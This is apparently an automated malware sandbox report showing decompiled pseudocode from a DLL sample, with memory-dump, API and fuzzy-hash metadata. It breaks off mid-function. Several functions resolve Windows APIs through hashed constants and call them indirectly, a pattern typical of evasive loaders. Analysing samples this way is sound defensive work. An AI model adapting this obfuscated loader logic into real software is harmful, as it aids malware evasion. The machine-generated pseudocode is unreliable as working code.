                                				void* __rdi;
                                				void* _t36;
                                				int _t40;
                                				void* _t43;
                                				void* _t44;
                                				intOrPtr _t52;
                                				signed long long _t62;
                                				long long _t65;
                                				_Unknown_base(*)()* _t85;
                                				void* _t89;
                                				void* _t90;
                                				void* _t92;
                                				signed long long _t93;
                                				struct _EXCEPTION_POINTERS* _t99;
                                
                                				_t45 = __ecx;
                                				 *((long long*)(_t92 + 0x10)) = __rbx;
                                				 *((long long*)(_t92 + 0x18)) = __rsi;
                                				_t3 = _t92 - 0x4f0; // -1288
                                				_t90 = _t3;
                                				_t93 = _t92 - 0x5f0;
                                				_t62 =  *0x13123760; // 0x8abfd9f97faf
                                				 *(_t90 + 0x4e0) = _t62 ^ _t93;
                                				_t52 = r8d;
                                				_t44 = __ecx;
                                				if (__ecx == 0xffffffff) goto 0x130ee3b3;
                                				E00007FFC7FFC130EBC04(_t36);
                                				_t5 = _t93 + 0x70; // 0x58
                                				r8d = 0x98;
                                				E00007FFC7FFC130EC440(__ecx, 0, _t52, __esp, _t5, __rdx, _t85, __r8);
                                				_t6 = _t90 + 0x10; // -1272
                                				r8d = 0x4d0;
                                				E00007FFC7FFC130EC440(_t45, 0, _t52, __esp, _t6, __rdx, _t85, __r8);
                                				_t7 = _t93 + 0x70; // 0x58
                                				 *((long long*)(_t93 + 0x48)) = _t7;
                                				_t10 = _t90 + 0x10; // -1272
                                				_t65 = _t10;
                                				 *((long long*)(_t93 + 0x50)) = _t65;
                                				__imp__RtlCaptureContext();
                                				r8d = 0;
                                				__imp__RtlLookupFunctionEntry();
                                				if (_t65 == 0) goto 0x130ee446;
                                				 *(_t93 + 0x38) =  *(_t93 + 0x38) & 0x00000000;
                                				_t16 = _t93 + 0x60; // 0x48
                                				 *((long long*)(_t93 + 0x30)) = _t16;
                                				_t19 = _t93 + 0x58; // 0x40
                                				 *((long long*)(_t93 + 0x28)) = _t19;
                                				_t21 = _t90 + 0x10; // -1272
                                				 *((long long*)(_t93 + 0x20)) = _t21;
                                				__imp__RtlVirtualUnwind();
                                				 *((long long*)(_t90 + 0x108)) =  *((intOrPtr*)(_t90 + 0x508));
                                				_t25 = _t90 + 0x508; // 0x0
                                				 *((intOrPtr*)(_t93 + 0x70)) = __edx;
                                				 *((long long*)(_t90 + 0xa8)) = _t25 + 8;
                                				 *((long long*)(_t90 - 0x80)) =  *((intOrPtr*)(_t90 + 0x508));
                                				 *((intOrPtr*)(_t93 + 0x74)) = _t52;
                                				_t40 = IsDebuggerPresent();
                                				SetUnhandledExceptionFilter(_t85, _t89);
                                				if (UnhandledExceptionFilter(_t99) != 0) goto 0x130ee4a8;
                                				if (_t40 != 0) goto 0x130ee4a8;
                                				if (_t44 == 0xffffffff) goto 0x130ee4a8;
                                				_t43 = E00007FFC7FFC130EBC04(_t42);
                                				E00007FFC7FFC130F6D80();
                                				return _t43;
                                			}


















                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                • String ID:
                                • API String ID: 1239891234-0
                                • Opcode ID: 07dcb6749cf727804a818c63ef9eb218394f6ec07e419224f6cd5021fde535cb
                                • Instruction ID: b8fa9b1c3342f5cd195a218d8db54b39ca3dff7b40b19d0f41d7a57df183d9ef
                                • Opcode Fuzzy Hash: 07dcb6749cf727804a818c63ef9eb218394f6ec07e419224f6cd5021fde535cb
                                • Instruction Fuzzy Hash: EE316E36708F9586EB60CF25E8442AE73A4FB88768F500535EA9D53B98DF3CC565CB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 46%
                                			E00000201201640C7FD4(signed int __edx, char* __rax, long long __rbx, void* __rcx, long long __rsi, void* __r8) {
                                				void* __rdi;
                                				signed int _t34;
                                				void* _t66;
                                				char* _t104;
                                				void* _t131;
                                				char* _t134;
                                				long long _t140;
                                				void* _t141;
                                				void* _t143;
                                				void* _t144;
                                				signed long long _t156;
                                				void* _t158;
                                
                                				_t106 = __rbx;
                                				_t104 = __rax;
                                				 *((long long*)(_t143 + 8)) = __rbx;
                                				 *((long long*)(_t143 + 0x18)) = _t140;
                                				 *((long long*)(_t143 + 0x20)) = __rsi;
                                				_t144 = _t143 - 0x40;
                                				r14d =  *0x640cd450;
                                				_t141 = __rcx;
                                				_t137 =  *((intOrPtr*)( *0x640cd458 + 8));
                                				r12d = 0;
                                				_t34 = r14d ^ __edx;
                                				if (_t34 == 0x139d2b8d) goto 0x640c80ef;
                                				if (_t34 == 0x15f5a8c2) goto 0x640c8115;
                                				if (_t34 == 0x2f77acf9) goto 0x640c80e9;
                                				if (_t34 == 0x48e12436) goto 0x640c81c8;
                                				if (_t34 == 0x4d382929) goto 0x640c8164;
                                				if (_t34 == 0xb016dc39) goto 0x640c80c9;
                                				if (_t34 == 0xb057dfc9) goto 0x640c805b;
                                				goto 0x640c821b;
                                				if (r9d == 0) goto 0x640c80bf;
                                				E00000201201640C85CC(r9d, __rbx, __r8,  *((intOrPtr*)( *0x640cd458 + 8)), _t158);
                                				if (_t104 == 0) goto 0x640c80b5;
                                				 *(_t144 + 0x20) =  *(_t144 + 0x20) & _t156;
                                				if (E00000201201640C14B8(_t104, _t106, _t141, 0x201640c34a4,  *((intOrPtr*)( *0x640cd458 + 8)), _t104,  *((intOrPtr*)(_t144 + 0x80))) != 0) goto 0x640c80a2;
                                				goto 0x640c821b;
                                				HeapFree(_t131, ??);
                                				goto 0x640c821b;
                                				goto 0x640c821b;
                                				goto 0x640c821b;
                                				E00000201201640C908C(0xd97160e4, _t104,  *((intOrPtr*)( *((intOrPtr*)( *0x640cd458 + 8)) + 0x18)));
                                				if (_t104 == 0) goto 0x640c80e2;
                                				 *_t104();
                                				goto 0x640c821b;
                                				r12d = 1;
                                				if ( *(_t141 + 0x50) == 0) goto 0x640c814a;
                                				E00000201201640C908C(0xf2d20ec6, _t104,  *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x28)) + 0x18)));
                                				if (_t104 == 0) goto 0x640c8139;
                                				 *_t104();
                                				goto 0x640c813e;
                                				if (r9d == 0) goto 0x640c80bf;
                                				E00000201201640C85CC(r9d,  *(_t141 + 0x50), _t104,  *((intOrPtr*)( *0x640cd458 + 8)), _t156);
                                				_t134 = _t104;
                                				if (_t104 == 0) goto 0x640c80b5;
                                				goto 0x640c807a;
                                				asm("sbb ebx, ebx");
                                				goto 0x640c814f;
                                				if (r12d == 0) goto 0x640c821b;
                                				if (0x426 != 0x426) goto 0x640c821b;
                                				if (_t134 == 0) goto 0x640c81be;
                                				if ( *_t134 == 0) goto 0x640c81be;
                                				E00000201201640C487A();
                                				if (E00000201201640C5448(_t104,  *(_t141 + 0x50), _t134, _t144 + 0x30, _t137, _t141) != 0) goto 0x640c81bc;
                                				if (E00000201201640C672C(_t134, _t144 + 0x30, _t144 + 0x68) == 0) goto 0x640c81be;
                                				asm("ror ax, 0x8");
                                				 *((short*)(_t144 + 0x32)) =  *(_t144 + 0x68) & 0x0000ffff;
                                				r12d = 1;
                                				if (0 != 0) goto 0x640c821b;
                                				if ( *(_t141 + 0x50) == 0) goto 0x640c81fb;
                                				 *(_t141 + 0x50) =  *(_t141 + 0x50) & 0x00000000;
                                				E00000201201640C2874( *((intOrPtr*)( *0x640cd458 + 8)),  *(_t141 + 0x50), _t134,  *(_t141 + 0x50));
                                				HeapFree(??, ??, ??);
                                				goto 0x640c8200;
                                				if (r12d == 0) goto 0x640c821b;
                                				_t27 = _t144 + 0x30; // 0x31
                                				_t66 = E00000201201640C9214( *((intOrPtr*)( *0x640cd458 + 8)), _t27, _t134,  *(_t141 + 0x50), _t141,  *((intOrPtr*)(_t141 + 0x38)), _t141 + 0x50);
                                				if ( *((long long*)(_t144 + 0x80)) == 0) goto 0x640c8241;
                                				if (_t66 == 0x3e5) goto 0x640c8241;
                                				r8d = _t66;
                                				E00000201201640C6AC0( *0x640cd458,  *((intOrPtr*)( *0x640cd458 + 8)), _t141,  *((intOrPtr*)(_t144 + 0x80)),  *(_t141 + 0x50), _t141);
                                				return _t66;
                                			}
















                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID: ))8M$6$H$lJu
                                • API String ID: 3298025750-2816507560
                                • Opcode ID: e943009c52edc3a9ff9218d50e7176983ae45fe1d98091206747ec6dadb96f7e
                                • Instruction ID: b34e566be8ca3f24712103137b9d27dd174bde8de77dc942104fe3c13a6e76d8
                                • Opcode Fuzzy Hash: e943009c52edc3a9ff9218d50e7176983ae45fe1d98091206747ec6dadb96f7e
                                • Instruction Fuzzy Hash: 2A61C822204B61C3FBA49B569C8E3EE52A9B784785F644021FF49477DFDE3AC865830C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 64%
                                			E00007FFC7FFC130EF964(void* __edx, intOrPtr* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, long long _a8, void* _a16, long long _a24, intOrPtr _a26, long long _a32) {
                                				long long _v72;
                                				intOrPtr _v80;
                                				void* _v88;
                                				long long _v96;
                                				long long _v104;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				void* _t33;
                                				void* _t37;
                                				intOrPtr* _t66;
                                				signed long long _t68;
                                				long long _t70;
                                				long long _t72;
                                				long long _t78;
                                				void* _t83;
                                				void* _t90;
                                				long long _t104;
                                				long long _t108;
                                				void* _t110;
                                				intOrPtr* _t112;
                                				void* _t114;
                                				void* _t117;
                                				intOrPtr _t129;
                                				void* _t131;
                                				void* _t132;
                                				signed long long _t133;
                                				signed long long _t134;
                                				signed long long _t137;
                                				intOrPtr* _t138;
                                
                                				_t66 = __rax;
                                				_a8 = __rbx;
                                				_a16 = __rdx;
                                				if (__rdx != 0) goto 0x130ef9a0;
                                				_t33 = E00007FFC7FFC130EE6A0(__rax);
                                				_t3 = _t108 + 0x16; // 0x16
                                				 *__rax = _t3;
                                				E00007FFC7FFC130EE580(_t33);
                                				goto 0x130efb40;
                                				asm("xorps xmm0, xmm0");
                                				 *((long long*)(__rdx)) = _t108;
                                				asm("movdqu [ebp-0x20], xmm0");
                                				_v72 = _t108;
                                				if ( *__rcx == _t108) goto 0x130efa0b;
                                				_a24 = 0x3f2a;
                                				_a26 = dil;
                                				E00007FFC7FFC130F3218( *__rcx,  &_a24);
                                				if (_t66 != 0) goto 0x130ef9e2;
                                				r8d = 0;
                                				_t37 = E00007FFC7FFC130EFB70(__rcx,  *__rcx,  &_a24, _t108, _t110, _t114, _t117,  &_v88);
                                				goto 0x130ef9ee;
                                				0x130efc80();
                                				r14d = _t37;
                                				if (_t37 != 0) goto 0x130ef9fe;
                                				goto 0x130ef9b2;
                                				goto 0x130efb04;
                                				_t112 = _v88;
                                				_t129 = _v80;
                                				_a24 = _t108;
                                				_t68 = _t129 - _t112;
                                				_t137 = (_t68 >> 3) + 1;
                                				_t90 =  >  ? _t108 : _t68 + 7 >> 3;
                                				_t134 = _t133 | 0xffffffff;
                                				if (_t90 == 0) goto 0x130efa6d;
                                				_t70 = _t134 + 1;
                                				if ( *((intOrPtr*)( *_t112 + _t70)) != dil) goto 0x130efa4e;
                                				if (_t108 + 1 != _t90) goto 0x130efa48;
                                				_a24 = _t108 + 1 + _t70;
                                				r8d = 1;
                                				E00007FFC7FFC130ED6D0(_t137, _t108 + 1 + _t70, _t108 + 1);
                                				_t78 = _t70;
                                				if (_t70 == 0) goto 0x130efafd;
                                				_t104 = _t70 + _t137 * 8;
                                				_t138 = _t112;
                                				_v96 = _t104;
                                				_a32 = _t104;
                                				if (_t112 == _t129) goto 0x130efaf3;
                                				_v104 = _t78 - _t112;
                                				_t131 = _t134 + 1;
                                				if ( *((intOrPtr*)( *_t138 + _t131)) != dil) goto 0x130efaad;
                                				_t132 = _t131 + 1;
                                				if (E00007FFC7FFC130F3144(0, _t104, _t78, _t104, _t104 - _t104 + _a24, _t132) != 0) goto 0x130efb58;
                                				_t72 = _a32;
                                				 *((long long*)(_v104 + _t138)) = _t72;
                                				_a32 = _t72 + _t132;
                                				if (_t138 + 8 != _t129) goto 0x130efaa7;
                                				r14d = 0;
                                				 *_a16 = _t78;
                                				E00007FFC7FFC130EE114(_a16, _v104);
                                				_t83 =  >  ? _t108 : _t129 - _t112 + 7 >> 3;
                                				if (_t83 == 0) goto 0x130efb35;
                                				E00007FFC7FFC130EE114(_a16,  *_t112);
                                				if (_t108 + 1 != _t83) goto 0x130efb21;
                                				E00007FFC7FFC130EE114(_a16, _t112);
                                				return r14d;
                                			}


































                                APIs
                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FFC130EF994
                                  • Part of subcall function 00007FFC130EE5A0: IsProcessorFeaturePresent.KERNEL32(00007FFC130F0B95), ref: 00007FFC130EE5A9
                                  • Part of subcall function 00007FFC130EE5A0: GetCurrentProcess.KERNEL32(00007FFC130F0B95), ref: 00007FFC130EE5CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                • String ID: *?$.
                                • API String ID: 4036615347-3972193922
                                • Opcode ID: 4cda8f812522c02942c11826489b886558005b358df05b685b12336f39f260f7
                                • Instruction ID: f95dd1a1179fcd6098ac39930be04504ea9cde9839ea17868ce99e4dd37e3983
                                • Opcode Fuzzy Hash: 4cda8f812522c02942c11826489b886558005b358df05b685b12336f39f260f7
                                • Instruction Fuzzy Hash: 30510162B15FA981EB10DFA298000B963E4FB44BECB454536DE1D27BC9EE3CD466C320
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 24%
                                			E00000201201640C31C0(long long __rbx, intOrPtr* __rcx, long long* __rdx, void* __r9) {
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				void* _t110;
                                				long long* _t130;
                                				long long* _t131;
                                				long long* _t132;
                                				long long* _t133;
                                				long long* _t134;
                                				void* _t163;
                                				void* _t164;
                                				intOrPtr* _t165;
                                				void* _t167;
                                				void* _t170;
                                				long long* _t172;
                                				void* _t174;
                                				void* _t175;
                                				void* _t177;
                                				long _t188;
                                				void* _t191;
                                				void* _t194;
                                				void* _t197;
                                
                                				_t134 = __rbx;
                                				 *((long long*)(_t174 + 0x10)) = __rbx;
                                				 *((intOrPtr*)(_t174 + 0x20)) = r9d;
                                				 *((intOrPtr*)(_t174 + 0x18)) = r8d;
                                				_t175 = _t174 - 0x50;
                                				_t168 =  *__rcx;
                                				_t130 = __rdx;
                                				_t165 = __rcx;
                                				E00000201201640C6C34(__rbx, __rdx, __rcx,  *__rcx, _t170, _t177, _t197, _t194);
                                				if (_t130 == _t134) goto 0x640c3469;
                                				_t110 =  *((char*)(_t165 + 0x75)) - 6;
                                				_t6 = _t134 + 4; // 0x4
                                				r12d = _t6;
                                				if (_t110 > 0) goto 0x640c322c;
                                				if (_t110 != 0) goto 0x640c3223;
                                				if ( *((char*)(_t165 + 0x74)) - 2 > 0) goto 0x640c322c;
                                				 *((intOrPtr*)(_t175 + 0x90)) = 0;
                                				goto 0x640c3234;
                                				 *((intOrPtr*)(_t175 + 0x90)) = r12d;
                                				E00000201201640C908C(0x3fe3c8ba, _t130,  *((intOrPtr*)(_t168 + 0x48)));
                                				if (_t130 == _t134) goto 0x640c325f;
                                				r9d = 0;
                                				r8d = 0;
                                				 *((intOrPtr*)(_t175 + 0x20)) = 0;
                                				 *_t130();
                                				goto 0x640c3262;
                                				_t131 = _t134;
                                				 *((long long*)(_t165 + 0x28)) = _t131;
                                				HeapFree(_t191, _t188, _t164);
                                				if ( *((intOrPtr*)(_t165 + 0x28)) == _t134) goto 0x640c3469;
                                				if ( *((intOrPtr*)(_t175 + 0xa0)) == 0) goto 0x640c32be;
                                				E00000201201640C908C(0xe7f09937, _t131,  *((intOrPtr*)(_t168 + 0x48)));
                                				if (_t131 == _t134) goto 0x640c32b4;
                                				_t18 = _t175 + 0xa0; // -14
                                				r9d = r12d;
                                				 *_t131();
                                				goto 0x640c32b6;
                                				if (0 == 0) goto 0x640c3469;
                                				E00000201201640C6C34(_t134,  *((intOrPtr*)(_t165 + 8)), _t165, _t168, _t130, _t18, _t167, _t170);
                                				if (_t131 == _t134) goto 0x640c3469;
                                				 *((intOrPtr*)(_t175 + 0x90)) = 0x100;
                                				if ( *((intOrPtr*)(_t175 + 0xb0)) == 0) goto 0x640c3326;
                                				 *((intOrPtr*)(_t175 + 0x40)) = 0xaa0;
                                				E00000201201640C908C(0xe7f09937, _t131,  *((intOrPtr*)(_t168 + 0x48)));
                                				if (_t131 == _t134) goto 0x640c3316;
                                				r9d = 4;
                                				 *_t131();
                                				asm("bts dword [esp+0x90], 0x17");
                                				goto 0x640c332b;
                                				E00000201201640C908C(0x7dda0345, _t131,  *((intOrPtr*)(_t168 + 0x48)));
                                				if (_t131 == _t134) goto 0x640c3350;
                                				r9d = 0;
                                				r8d = 0x50;
                                				 *_t131();
                                				goto 0x640c3353;
                                				_t132 = _t134;
                                				 *((long long*)(_t165 + 0x30)) = _t132;
                                				HeapFree(??, ??, ??);
                                				if ( *((intOrPtr*)(_t165 + 0x30)) == _t134) goto 0x640c3469;
                                				E00000201201640C6C34(_t134,  *((intOrPtr*)(_t165 + 0x10)), _t165, _t168, _t130, _t131);
                                				_t172 = _t132;
                                				if (_t132 == _t134) goto 0x640c3469;
                                				E00000201201640C908C(0xaa9d9fc1, _t132,  *((intOrPtr*)(_t168 + 0x48)));
                                				if (_t132 == _t134) goto 0x640c33de;
                                				_t163 =  !=  ?  *0x640cd448 + 0x201640d1250 :  *0x640cd448 + 0x201640d1268;
                                				r9d = 0;
                                				 *((intOrPtr*)(_t175 + 0x30)) =  *((intOrPtr*)(_t175 + 0x90));
                                				 *((long long*)(_t175 + 0x28)) = _t134;
                                				 *((long long*)(_t175 + 0x20)) = _t134;
                                				 *_t132();
                                				goto 0x640c33e1;
                                				_t133 = _t134;
                                				 *((long long*)(_t165 + 0x38)) = _t133;
                                				HeapFree(??, ??, ??);
                                				if ( *((intOrPtr*)(_t165 + 0x38)) == _t134) goto 0x640c3469;
                                				 *((intOrPtr*)(_t175 + 0x44)) = 4;
                                				E00000201201640C908C(0x677ec78c, _t133,  *((intOrPtr*)(_t168 + 0x48)));
                                				_t48 = _t172 + 0x1b; // 0x1f
                                				r12d = _t48;
                                				if (_t133 == _t134) goto 0x640c3431;
                                				 *_t133();
                                				goto 0x640c3433;
                                				if (0 == 0) goto 0x640c3487;
                                				asm("bts dword [esp+0x90], 0x8");
                                				E00000201201640C908C(0xe7f09937, _t133,  *((intOrPtr*)(_t168 + 0x48)));
                                				if (_t133 == _t134) goto 0x640c3487;
                                				r9d = 4;
                                				 *_t133();
                                				goto 0x640c3487;
                                				E00000201201640C908C(0xc06f8334, _t133,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (_t133 == _t134) goto 0x640c3482;
                                				 *_t133();
                                				goto 0x640c3487;
                                				return 0x7f;
                                			}


























                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc
                                • String ID:
                                • API String ID: 3901518246-0
                                • Opcode ID: bb3dd621c95c53055fcba926f55aa16ae10003733876a93a6dfeee260ac781c3
                                • Instruction ID: f9bfb8bc1bec50d693624aa94dc542e1111a3951b48ed9a2f7f26a4548020059
                                • Opcode Fuzzy Hash: bb3dd621c95c53055fcba926f55aa16ae10003733876a93a6dfeee260ac781c3
                                • Instruction Fuzzy Hash: C48181323147A0D7EB20DF92E84A3DA63A5F788784F544425AB4E47F8ACF3AD465C708
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 31%
                                			E00000201201640C204C(long long __rbx, intOrPtr* __rcx, void* __r8) {
                                				signed long long _t114;
                                				void* _t138;
                                				long _t141;
                                				long long _t144;
                                				signed long long _t146;
                                				signed long long _t148;
                                				void* _t149;
                                				long _t160;
                                				signed long long _t161;
                                				long _t163;
                                				void* _t166;
                                
                                				_t114 = _t148;
                                				 *((long long*)(_t114 + 0x18)) = __rbx;
                                				 *((long long*)(_t114 + 0x20)) = _t144;
                                				_t149 = _t148 - 0x40;
                                				r14d = 0;
                                				 *(_t114 + 0x10) = r14d;
                                				 *(__rcx + 0x5c) = r14d;
                                				if ( *((intOrPtr*)(__rcx + 0x58)) != r14d) goto 0x640c2275;
                                				 *((intOrPtr*)(_t114 + 8)) = 4;
                                				E00000201201640C908C(0x5431d47a, _t114,  *((intOrPtr*)( *__rcx + 0x48)));
                                				if (_t114 == _t166) goto 0x640c20af;
                                				 *_t114();
                                				goto 0x640c20b2;
                                				if (r14d == r14d) goto 0x640c2257;
                                				E00000201201640C908C(0xbe782669, _t114,  *((intOrPtr*)( *__rcx + 0x48)));
                                				if (_t114 == _t166) goto 0x640c20f6;
                                				_t11 = _t149 + 0x78; // -6
                                				r8d = 0;
                                				 *((long long*)(_t149 + 0x28)) = _t11;
                                				_t14 = _t149 + 0x70; // -14
                                				 *(_t149 + 0x20) = _t14;
                                				 *_t114();
                                				goto 0x640c20f9;
                                				if (r14d == r14d) goto 0x640c2257;
                                				 *(_t149 + 0x78) = r14d;
                                				 *(_t149 + 0x70) = r14d;
                                				E00000201201640C908C(0xbe782669, _t114,  *((intOrPtr*)( *__rcx + 0x48)));
                                				if (_t114 == _t166) goto 0x640c2143;
                                				_t20 = _t149 + 0x78; // -6
                                				r9d = 0;
                                				r8d = 0;
                                				 *((long long*)(_t149 + 0x28)) = _t20;
                                				_t22 = _t149 + 0x70; // -14
                                				 *(_t149 + 0x20) = _t22;
                                				 *_t114();
                                				r8d =  *(_t149 + 0x70);
                                				HeapAlloc(_t166, _t163, _t160);
                                				_t161 = _t114;
                                				if (_t114 == _t166) goto 0x640c2250;
                                				E00000201201640C908C(0xbe782669, _t114,  *((intOrPtr*)( *__rcx + 0x48)));
                                				if (_t114 == _t166) goto 0x640c219c;
                                				_t28 = _t149 + 0x78; // -6
                                				r8d = 0;
                                				 *((long long*)(_t149 + 0x28)) = _t28;
                                				_t30 = _t149 + 0x70; // -14
                                				 *(_t149 + 0x20) = _t30;
                                				 *_t114();
                                				goto 0x640c219f;
                                				if (r14d == r14d) goto 0x640c2222;
                                				 *(_t149 + 0x70) =  *(_t149 + 0x70) >> 1;
                                				 *((intOrPtr*)(_t161 + _t114 * 2)) = r14w;
                                				r8d =  *(_t149 + 0x70);
                                				HeapAlloc(_t138, _t141);
                                				_t146 = _t114;
                                				if (_t114 == _t166) goto 0x640c221b;
                                				E00000201201640C908C(0x880a500a, _t114,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (_t114 == _t166) goto 0x640c2210;
                                				r9d =  *(_t149 + 0x70);
                                				 *(_t149 + 0x38) = _t166;
                                				 *(_t149 + 0x30) = _t166;
                                				 *((intOrPtr*)(_t149 + 0x28)) = _t161 + 1;
                                				 *(_t149 + 0x20) = _t146;
                                				 *(_t149 + 0x70) =  *_t114();
                                				goto 0x640c2215;
                                				 *(_t149 + 0x70) = r14d;
                                				 *(__rcx + 0x20) = _t146;
                                				goto 0x640c2240;
                                				goto 0x640c2240;
                                				E00000201201640C908C(0xc06f8334, _t114,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (_t114 == _t166) goto 0x640c223b;
                                				 *_t114();
                                				goto 0x640c2240;
                                				HeapFree(??, ??, ??);
                                				goto 0x640c2275;
                                				goto 0x640c2275;
                                				E00000201201640C908C(0xc06f8334, _t114,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (_t114 == _t166) goto 0x640c2270;
                                				 *_t114();
                                				goto 0x640c2275;
                                				return 0x7f;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$Alloc$ErrorFreeLast
                                • String ID:
                                • API String ID: 861356407-0
                                • Opcode ID: 0d16cc31d8c4b20fd9f3a2fec83417e35b9a07ea40dd460ae92dda63533fb1d6
                                • Instruction ID: 8ed5c75b418230f8f0b06644f7260a37ec3b44651f73bdfd9761fc19c6c3d728
                                • Opcode Fuzzy Hash: 0d16cc31d8c4b20fd9f3a2fec83417e35b9a07ea40dd460ae92dda63533fb1d6
                                • Instruction Fuzzy Hash: BB51CF32704750D7EB20CFA6E8456AE63A4F7C8784F201415BF8D53B6ACF3AC4A18B08
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 29%
                                			E00000201201640C34A4(long long __rbx, long long __rcx, signed long long __rdx, long long __r8, long long _a8, signed int _a16, char _a24, long long _a32) {
                                				long long _v72;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				signed int _t28;
                                				intOrPtr _t29;
                                				signed short _t31;
                                				void* _t33;
                                				signed short _t50;
                                				signed short _t51;
                                				signed short _t55;
                                				signed long long _t88;
                                				signed long long _t97;
                                				signed long long _t106;
                                				void* _t109;
                                				signed long long _t110;
                                				intOrPtr* _t111;
                                				void* _t112;
                                				void* _t113;
                                				long long _t116;
                                				void* _t117;
                                				void* _t118;
                                				long long _t123;
                                				signed long long _t124;
                                				void* _t130;
                                
                                				_t123 = __r8;
                                				_t106 = __rdx;
                                				_t89 = __rbx;
                                				_a32 = __rbx;
                                				_a8 = __rcx;
                                				_t88 = __rdx;
                                				if (__rdx == _t109) goto 0x640c369e;
                                				if ( *__rdx == dil) goto 0x640c369e;
                                				E00000201201640C6C34(__rbx, __rdx, _t109, _t113, _t118, __r8);
                                				if (_t88 == _t109) goto 0x640c3699;
                                				E00000201201640C97A0(0, _t88, _t89, _t113, _t118, __r8);
                                				r8d = 0;
                                				_t119 = _t88;
                                				if (_t88 == _t123) goto 0x640c3684;
                                				r12d = _a16 & 0x0000ffff;
                                				_t110 = _t88;
                                				_t28 =  *_t110 & 0x0000ffff;
                                				if (_t28 == r8w) goto 0x640c353e;
                                				if (_t28 == 0x7c) goto 0x640c3538;
                                				_t29 =  *((intOrPtr*)(_t110 + 2));
                                				if (_t29 != r8w) goto 0x640c3525;
                                				if (_t29 != r8w) goto 0x640c3541;
                                				_t116 = _t123;
                                				if (_t116 == _t123) goto 0x640c3555;
                                				_t117 = _t116 + 2;
                                				goto 0x640c357e;
                                				E00000201201640C908C(0xf502ade, _t88,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				r8d = 0;
                                				if (_t88 == _t123) goto 0x640c357b;
                                				_t97 = _t110;
                                				_t31 =  *_t88();
                                				r8d = 0;
                                				_a16 = _t31;
                                				goto 0x640c3582;
                                				_t50 = r8d;
                                				_a16 = _t50;
                                				if (_t50 == r8d) goto 0x640c35b8;
                                				_t8 = _t97 - 1; // -1
                                				_t55 = _t8;
                                				r12w =  *(_t110 + _t106 * 2);
                                				if (r12w == 0x20) goto 0x640c359d;
                                				if (r12w != 9) goto 0x640c35a8;
                                				_t51 = _t55;
                                				_a16 = _t55;
                                				if (_t55 != r8d) goto 0x640c3587;
                                				if (_t51 == r8d) goto 0x640c35b8;
                                				r12w =  *_t110;
                                				if (r12w == 0x20) goto 0x640c35bf;
                                				if (r12w != 9) goto 0x640c35cb;
                                				_t111 = _t110 + 2;
                                				_a16 = _t51 - 1;
                                				goto 0x640c35a8;
                                				 *((intOrPtr*)(_t111 + _t88 * 2)) = r8w;
                                				if ( *_t111 == r8w) goto 0x640c3607;
                                				_v72 = _t123;
                                				r9d = 0;
                                				_t124 = _t88;
